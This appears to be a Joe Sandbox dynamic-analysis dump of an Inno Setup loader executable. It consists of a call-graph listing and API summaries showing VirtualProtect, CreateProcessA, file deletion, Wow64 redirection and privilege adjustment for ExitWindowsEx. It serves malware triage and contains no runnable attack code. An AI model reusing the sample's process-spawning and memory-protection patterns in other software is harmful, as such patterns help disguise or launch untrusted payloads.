6424->6425 6426 405ab6 6425->6426 6426->6410 6427 4076c8 WriteFile 6428 4076e8 6427->6428 6429 4076ef 6427->6429 6430 40748c 21 API calls 6428->6430 6431 407700 6429->6431 6432 4073ec 20 API calls 6429->6432 6430->6429 6432->6431 6433 40a2ca 6442 4096fc 6433->6442 6436 402f24 5 API calls 6437 40a2d4 6436->6437 6438 403198 4 API calls 6437->6438 6439 40a2f3 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2fb 6440->6441 6451 40569c 6442->6451 6444 409745 6448 403198 4 API calls 6444->6448 6445 409717 6445->6444 6457 40720c 6445->6457 6447 409735 6450 40973d MessageBoxA 6447->6450 6449 40975a 6448->6449 6449->6436 6450->6444 6452 403154 4 API calls 6451->6452 6454 4056a1 6452->6454 6453 4056b9 6453->6445 6454->6453 6455 403154 4 API calls 6454->6455 6456 4056af 6455->6456 6456->6445 6458 40569c 4 API calls 6457->6458 6459 40721b 6458->6459 6460 407221 6459->6460 6461 40722f 6459->6461 6462 40322c 4 API calls 6460->6462 6463 40723f 6461->6463 6466 40724b 6461->6466 6465 40722d 6462->6465 6468 4071d0 6463->6468 6465->6447 6475 4032b8 6466->6475 6469 40322c 4 API calls 6468->6469 6470 4071df 6469->6470 6471 4071fc 6470->6471 6472 406950 CharPrevA 6470->6472 6471->6465 6473 4071eb 6472->6473 6473->6471 6474 4032fc 4 API calls 6473->6474 6474->6471 6476 403278 4 API calls 6475->6476 6477 4032c2 6476->6477 6477->6465 6478 402ccc 6479 402cdd 6478->6479 6483 402cfe 6478->6483 6480 402d88 RtlUnwind 6479->6480 6482 402b28 RaiseException 6479->6482 6479->6483 6481 403154 4 API calls 6480->6481 6481->6483 6484 402d7f 6482->6484 6484->6480 6805 403fcd 6806 403f07 4 API calls 6805->6806 6807 403fd6 6806->6807 6808 403e9c 4 API calls 6807->6808 6809 403fe2 6808->6809 5463 4024d0 5464 4024e4 5463->5464 5465 4024f7 5463->5465 5502 401918 RtlInitializeCriticalSection 5464->5502 5467 402518 5465->5467 5468 40250e RtlEnterCriticalSection 5465->5468 5479 402300 5467->5479 5468->5467 5471 4024ed 5473 402525 5476 402581 5473->5476 5477 402577 RtlLeaveCriticalSection 5473->5477 5475 402531 5475->5473 5509 40215c 5475->5509 5477->5476 5480 402314 5479->5480 5481 402335 5480->5481 5482 4023b8 5480->5482 5484 402344 5481->5484 5523 401b74 5481->5523 5482->5484 5487 402455 5482->5487 5526 401d80 5482->5526 5534 401e84 5482->5534 5484->5473 5489 401fd4 5484->5489 5487->5484 5530 401d00 5487->5530 5490 401fe8 5489->5490 5491 401ffb 5489->5491 5492 401918 4 API calls 5490->5492 5493 402012 RtlEnterCriticalSection 5491->5493 5496 40201c 5491->5496 5494 401fed 5492->5494 5493->5496 5494->5491 5495 401ff1 5494->5495 5499 402052 5495->5499 5496->5499 5616 401ee0 5496->5616 5499->5475 5500 402147 5500->5475 5501 40213d RtlLeaveCriticalSection 5501->5500 5503 40193c RtlEnterCriticalSection 5502->5503 5504 401946 5502->5504 5503->5504 5505 401964 LocalAlloc 5504->5505 5506 40197e 5505->5506 5507 4019c3 RtlLeaveCriticalSection 5506->5507 5508 4019cd 5506->5508 5507->5508 5508->5465 5508->5471 5510 40217a 5509->5510 5511 402175 5509->5511 5512 4021ab RtlEnterCriticalSection 5510->5512 5515 4021b5 5510->5515 5519 40217e 5510->5519 5513 401918 4 API calls 5511->5513 5512->5515 5513->5510 5514 4021c1 5517 4022e3 RtlLeaveCriticalSection 5514->5517 5518 4022ed 5514->5518 5515->5514 5516 402244 5515->5516 5521 402270 5515->5521 5516->5519 5520 401d80 7 API calls 5516->5520 5517->5518 5518->5473 5519->5473 5520->5519 5521->5514 5522 401d00 7 API calls 5521->5522 5522->5514 5524 40215c 9 API calls 5523->5524 5525 401b95 5524->5525 5525->5484 5527 401d92 5526->5527 5528 401d89 5526->5528 5527->5482 5528->5527 5529 401b74 9 API calls 5528->5529 5529->5527 5531 401d1e 5530->5531 5532 401d4e 5530->5532 5531->5484 5532->5531 5539 401c68 5532->5539 5594 401768 5534->5594 5536 401e99 5537 401ea6 5536->5537 5605 401dcc 5536->5605 5537->5482 5540 401c7a 5539->5540 5541 401c9d 5540->5541 5542 401caf 5540->5542 5552 40188c 5541->5552 5543 40188c 3 API calls 5542->5543 5545 401cad 5543->5545 5546 401cc5 5545->5546 5562 401b44 5545->5562 5546->5531 5548 401cd4 5549 401cee 5548->5549 5567 401b98 5548->5567 5572 4013a0 5549->5572 5553 4018b2 5552->5553 5561 40190b 5552->5561 5576 401658 5553->5576 5558 4018e6 5560 4013a0 LocalAlloc 5558->5560 5558->5561 5560->5561 5561->5545 5563 401b52 5562->5563 5564 401b61 5562->5564 5565 401d00 9 API calls 5563->5565 5564->5548 5566 401b5f 5565->5566 5566->5548 5568 401bab 5567->5568 5569 401b9d 5567->5569 5568->5549 5570 401b74 9 API calls 5569->5570 5571 401baa 5570->5571 5571->5549 5573 4013ab 5572->5573 5574 4012e4 LocalAlloc 5573->5574 5575 4013c6 5573->5575 5574->5575 5575->5546 5578 40168f 5576->5578 5577 4016cf 5580 40132c 5577->5580 5578->5577 5579 4016a9 VirtualFree 5578->5579 5579->5578 5581 401348 5580->5581 5588 4012e4 5581->5588 5584 40150c 5586 40153b 5584->5586 5585 401594 5585->5558 5586->5585 5587 401568 VirtualFree 5586->5587 5587->5586 5591 40128c 5588->5591 5592 401298 LocalAlloc 5591->5592 5593 4012aa 5591->5593 5592->5593 5593->5558 5593->5584 5595 401787 5594->5595 5596 40183b 5595->5596 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5595->5597 5599 40132c LocalAlloc 5595->5599 5600 401821 5595->5600 5601 4017d6 5595->5601 5602 4017e7 5596->5602 5612 4015c4 5596->5612 5597->5595 5599->5595 5603 40150c VirtualFree 5600->5603 5604 40150c VirtualFree 5601->5604 5602->5536 5603->5602 5604->5602 5606 401d80 9 API calls 5605->5606 5607 401de0 5606->5607 5608 40132c LocalAlloc 5607->5608 5609 401df0 5608->5609 5610 401b44 9 API calls 5609->5610 5611 401df8 5609->5611 5610->5611 5611->5537 5613 40160a 5612->5613 5614 401626 VirtualAlloc 5613->5614 5615 40163a 5613->5615 5614->5613 5614->5615 5615->5602 5620 401ef0 5616->5620 5617 401f1c 5618 401d00 9 API calls 5617->5618 5621 401f40 5617->5621 5618->5621 5620->5617 5620->5621 5622 401e58 5620->5622 5621->5500 5621->5501 5627 4016d8 5622->5627 5625 401dcc 9 API calls 5626 401e75 5625->5626 5626->5620 5633 4016f4 5627->5633 5629 4016fe 5630 4015c4 VirtualAlloc 5629->5630 5635 40170a 5630->5635 5631 40175b 5631->5625 5631->5626 5632 40132c LocalAlloc 5632->5633 5633->5629 5633->5631 5633->5632 5634 40174f 5633->5634 5637 401430 5633->5637 5636 40150c VirtualFree 5634->5636 5635->5631 5636->5631 5638 40143f VirtualAlloc 5637->5638 5640 40146c 5638->5640 5641 40148f 5638->5641 5642 4012e4 LocalAlloc 5640->5642 5641->5633 5643 401478 5642->5643 5643->5641 5644 40147c VirtualFree 5643->5644 5644->5641 6485 4028d2 6486 4028da 6485->6486 6487 403554 4 API calls 6486->6487 6488 4028ef 6486->6488 6487->6486 6489 4025ac 4 API calls 6488->6489 6490 4028f4 6489->6490 6810 4019d3 6811 4019ba 6810->6811 6812 4019c3 RtlLeaveCriticalSection 6811->6812 6813 4019cd 6811->6813 6812->6813 6032 407fd4 6033 407fe6 6032->6033 6035 407fed 6032->6035 6043 407f10 6033->6043 6037 408015 6035->6037 6038 408017 6035->6038 6042 408021 6035->6042 6036 40804e 6057 407e2c 6037->6057 6054 407d7c 6038->6054 6039 407d7c 19 API calls 6039->6036 6042->6036 6042->6039 6044 407f25 6043->6044 6045 407d7c 19 API calls 6044->6045 6046 407f34 6044->6046 6045->6046 6047 407f6e 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f82 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6053 407fae 6049->6053 6064 407eb8 6049->6064 6050->6049 6053->6035 6067 4058b4 6054->6067 6056 407d9e 6056->6042 6058 405184 19 API calls 6057->6058 6059 407e57 6058->6059 6075 407de4 6059->6075 6061 407e5f 6062 403198 4 API calls 6061->6062 6063 407e74 6062->6063 6063->6042 6065 407ec7 VirtualFree 6064->6065 6066 407ed9 VirtualAlloc 6064->6066 6065->6066 6066->6053 6068 4058c0 6067->6068 6069 405184 19 API calls 6068->6069 6070 4058ed 6069->6070 6071 4031e8 4 API calls 6070->6071 6072 4058f8 6071->6072 6073 403198 4 API calls 6072->6073 6074 40590d 6073->6074 6074->6056 6076 4058b4 19 API calls 6075->6076 6077 407e06 6076->6077 6077->6061 6495 40a0d5 6496 40a105 6495->6496 6497 40a10f CreateWindowExA SetWindowLongA 6496->6497 6498 405184 19 API calls 6497->6498 6499 40a192 6498->6499 6500 4032fc 4 API calls 6499->6500 6501 40a1a0 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1ad 6502->6503 6504 406b7c 5 API calls 6503->6504 6505 40a1b9 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1c2 6506->6507 6508 4099a4 29 API calls 6507->6508 6509 40a1d4 6508->6509 6510 409884 5 API calls 6509->6510 6511 40a1e7 6509->6511 6510->6511 6512 40a220 6511->6512 6513 4094d8 9 API calls 6511->6513 6514 40a239 6512->6514 6517 40a233 RemoveDirectoryA 6512->6517 6513->6512 6515 40a242 73A15CF0 6514->6515 6516 40a24d 6514->6516 6515->6516 6518 40a275 6516->6518 6519 40357c 4 API calls 6516->6519 6517->6514 6520 40a26b 6519->6520 6521 4025ac 4 API calls 6520->6521 6521->6518 6080 40a0e7 6081 40a0eb SetLastError 6080->6081 6112 409648 GetLastError 6081->6112 6084 40a105 6086 40a10f CreateWindowExA SetWindowLongA 6084->6086 6085 402f24 5 API calls 6085->6084 6087 405184 19 API calls 6086->6087 6088 40a192 6087->6088 6089 4032fc 4 API calls 6088->6089 6090 40a1a0 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1ad 6091->6092 6125 406b7c GetCommandLineA 6092->6125 6095 4032fc 4 API calls 6096 40a1c2 6095->6096 6130 4099a4 6096->6130 6099 409884 5 API calls 6100 40a1e7 6099->6100 6101 40a220 6100->6101 6102 40a207 6100->6102 6104 40a239 6101->6104 6107 40a233 RemoveDirectoryA 6101->6107 6146 4094d8 6102->6146 6105 40a242 73A15CF0 6104->6105 6106 40a24d 6104->6106 6105->6106 6108 40a275 6106->6108 6154 40357c 6106->6154 6107->6104 6110 40a26b 6111 4025ac 4 API calls 6110->6111 6111->6108 6113 404c84 19 API calls 6112->6113 6114 40968f 6113->6114 6115 407284 5 API calls 6114->6115 6116 40969f 6115->6116 6117 408da8 4 API calls 6116->6117 6118 4096b4 6117->6118 6119 405880 4 API calls 6118->6119 6120 4096c3 6119->6120 6121 4031b8 4 API calls 6120->6121 6122 4096e2 6121->6122 6123 403198 4 API calls 6122->6123 6124 4096ea 6123->6124 6124->6084 6124->6085 6126 406af0 4 API calls 6125->6126 6127 406ba1 6126->6127 6128 403198 4 API calls 6127->6128 6129 406bbf 6128->6129 6129->6095 6131 4033b4 4 API calls 6130->6131 6132 4099df 6131->6132 6133 409a11 CreateProcessA 6132->6133 6134 409a24 CloseHandle 6133->6134 6135 409a1d 6133->6135 6137 409a2d 6134->6137 6136 409648 21 API calls 6135->6136 6136->6134 6167 409978 6137->6167 6140 409a49 6141 409978 3 API calls 6140->6141 6142 409a4e GetExitCodeProcess CloseHandle 6141->6142 6143 409a6e 6142->6143 6144 403198 4 API calls 6143->6144 6145 409a76 6144->6145 6145->6099 6145->6100 6147 409532 6146->6147 6148 4094eb 6146->6148 6147->6101 6148->6147 6149 4094f3 Sleep 6148->6149 6150 409503 Sleep 6148->6150 6152 40951a GetLastError 6148->6152 6171 408fbc 6148->6171 6149->6148 6150->6148 6152->6147 6153 409524 GetLastError 6152->6153 6153->6147 6153->6148 6155 403591 6154->6155 6163 4035a0 6154->6163 6159 4035d0 6155->6159 6160 40359b 6155->6160 6162 4035b6 6155->6162 6156 4035b1 6161 403198 4 API calls 6156->6161 6157 4035b8 6158 4031b8 4 API calls 6157->6158 6158->6162 6159->6162 6165 40357c 4 API calls 6159->6165 6160->6163 6164 4035ec 6160->6164 6161->6162 6162->6110 6163->6156 6163->6157 6164->6162 6179 403554 6164->6179 6165->6159 6168 40998c PeekMessageA 6167->6168 6169 409980 TranslateMessage DispatchMessageA 6168->6169 6170 40999e MsgWaitForMultipleObjects 6168->6170 6169->6168 6170->6137 6170->6140 6172 408f70 2 API calls 6171->6172 6173 408fd2 6172->6173 6174 408fd6 6173->6174 6175 408ff2 DeleteFileA GetLastError 6173->6175 6174->6148 6176 409010 6175->6176 6177 408fac Wow64RevertWow64FsRedirection 6176->6177 6178 409018 6177->6178 6178->6148 6180 403566 6179->6180 6182 403578 6180->6182 6183 403604 6180->6183 6182->6164 6184 40357c 6183->6184 6185 4035a0 6184->6185 6189 4035d0 6184->6189 6190 40359b 6184->6190 6192 4035b6 6184->6192 6186 4035b1 6185->6186 6187 4035b8 6185->6187 6191 403198 4 API calls 6186->6191 6188 4031b8 4 API calls 6187->6188 6188->6192 6189->6192 6194 40357c 4 API calls 6189->6194 6190->6185 6193 4035ec 6190->6193 6191->6192 6192->6180 6193->6192 6195 403554 4 API calls 6193->6195 6194->6189 6195->6193 6817 402be9 RaiseException 6818 402c04 6817->6818 6528 402af2 6529 402afe 6528->6529 6532 402ed0 6529->6532 6533 403154 4 API calls 6532->6533 6535 402ee0 6533->6535 6534 402b03 6535->6534 6537 402b0c 6535->6537 6538 402b25 6537->6538 6539 402b15 RaiseException 6537->6539 6538->6534 6539->6538 6819 402dfa 6820 402e26 6819->6820 6821 402e0d 6819->6821 6823 402ba4 6821->6823 6824 402bc9 6823->6824 6825 402bad 6823->6825 6824->6820 6826 402bb5 RaiseException 6825->6826 6826->6824 6827 4075fa GetFileSize 6828 407626 6827->6828 6829 407616 GetLastError 6827->6829 6829->6828 6830 40761f 6829->6830 6831 40748c 21 API calls 6830->6831 6831->6828 6832 406ffb 6833 407008 SetErrorMode 6832->6833 6544 403a80 CloseHandle 6545 403a90 6544->6545 6546 403a91 GetLastError 6544->6546 6547 40a282 6548 40a1f4 6547->6548 6549 4094d8 9 API calls 6548->6549 6551 40a220 6548->6551 6549->6551 6550 40a239 6552 40a242 73A15CF0 6550->6552 6553 40a24d 6550->6553 6551->6550 6554 40a233 RemoveDirectoryA 6551->6554 6552->6553 6555 40a275 6553->6555 6556 40357c 4 API calls 6553->6556 6554->6550 6557 40a26b 6556->6557 6558 4025ac 4 API calls 6557->6558 6558->6555 6559 404283 6560 4042c3 6559->6560 6561 403154 4 API calls 6560->6561 6562 404323 6561->6562 6834 404185 6835 4041ff 6834->6835 6836 4041cc 6835->6836 6837 403154 4 API calls 6835->6837 6838 404323 6837->6838 6563 40a287 6564 40a290 6563->6564 6566 40a2bb 6563->6566 6573 409448 6564->6573 6568 403198 4 API calls 6566->6568 6567 40a295 6567->6566 6570 40a2b3 MessageBoxA 6567->6570 6569 40a2f3 6568->6569 6571 403198 4 API calls 6569->6571 6570->6566 6572 40a2fb 6571->6572 6574 409454 GetCurrentProcess OpenProcessToken 6573->6574 6575 4094af ExitWindowsEx 6573->6575 6576 409466 6574->6576 6577 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6574->6577 6575->6576 6576->6567 6577->6575 6577->6576 6578 403e87 6579 403e4c 6578->6579 6580 403e62 6579->6580 6581 403e7b 6579->6581 6582 403e67 6579->6582 6587 403cc8 6580->6587 6583 402674 4 API calls 6581->6583 6585 403e78 6582->6585 6591 402674 6582->6591 6583->6585 6588 403cd6 6587->6588 6589 402674 4 API calls 6588->6589 6590 403ceb 6588->6590 6589->6590 6590->6582 6592 403154 4 API calls 6591->6592 6593 40267a 6592->6593 6593->6585 6598 407e90 6599 407eb8 VirtualFree 6598->6599 6600 407e9d 6599->6600 6847 403991 6848 403983 6847->6848 6849 40374c VariantClear 6848->6849 6850 40398b 6849->6850 6851 405b92 6853 405b94 6851->6853 6852 405bd0 6856 405930 5 API calls 6852->6856 6853->6852 6854 405be7 6853->6854 6855 405bca 6853->6855 6860 404ccc 5 API calls 6854->6860 6855->6852 6857 405c3c 6855->6857 6858 405be3 6856->6858 6859 4059a0 19 API calls 6857->6859 6861 403198 4 API calls 6858->6861 6859->6858 6862 405c10 6860->6862 6863 405c76 6861->6863 6864 4059a0 19 API calls 6862->6864 6864->6858 6603 403e95 6604 403e4c 6603->6604 6605 403e67 6604->6605 6606 403e62 6604->6606 6607 403e7b 6604->6607 6610 403e78 6605->6610 6611 402674 4 API calls 6605->6611 6609 403cc8 4 API calls 6606->6609 6608 402674 4 API calls 6607->6608 6608->6610 6609->6605 6611->6610 6612 403a97 6613 403aac 6612->6613 6614 403bbc GetStdHandle 6613->6614 6615 403b0e CreateFileA 6613->6615 6625 403ab2 6613->6625 6616 403c17 GetLastError 6614->6616 6620 403bba 6614->6620 6615->6616 6617 403b2c 6615->6617 6616->6625 6619 403b3b GetFileSize 6617->6619 6617->6620 6619->6616 6622 403b4e SetFilePointer 6619->6622 6621 403be7 GetFileType 6620->6621 6620->6625 6624 403c02 CloseHandle 6621->6624 6621->6625 6622->6616 6626 403b6a ReadFile 6622->6626 6624->6625 6626->6616 6627 403b8c 6626->6627 6627->6620 6628 403b9f SetFilePointer 6627->6628 6628->6616 6629 403bb0 SetEndOfFile 6628->6629 6629->6616 6629->6620 6883 4011aa 6884 4011ac GetStdHandle 6883->6884 6222 4076ac SetEndOfFile 6223 4076c3 6222->6223 6224 4076bc 6222->6224 6225 40748c 21 API calls 6224->6225 6225->6223 6633 4028ac 6634 402594 4 API calls 6633->6634 6635 4028b6 6634->6635 6636 401ab9 6637 401a96 6636->6637 6638 401aa9 RtlDeleteCriticalSection 6637->6638 6639 401a9f RtlLeaveCriticalSection 6637->6639 6639->6638

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 126 409b97 124->126 127 409b99-409b9b 124->127 125->124 128 409b7a-409b7d 125->128 126->127 130 409baa-409bad 127->130 128->124 129 409b7f-409b82 128->129 129->124 129->127 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                          APIs
                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                          • String ID:
                                                                          • API String ID: 2441996862-0
                                                                          • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                          • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                          • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02137C50), ref: 0040966C
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(00020464,000000FC,00409918), ref: 0040A148
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A15CF0.USER32(00020464,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 3341979996-3001827809
                                                                          • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                          • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                          • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                          • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303330284.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.3303403266.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                          • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                          • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                          • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(00020464,000000FC,00409918), ref: 0040A148
                                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90,00000000), ref: 00409A28
                                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02137C50,00409A90), ref: 00409A5C
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A15CF0.USER32(00020464,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3303292174.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.3303254906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
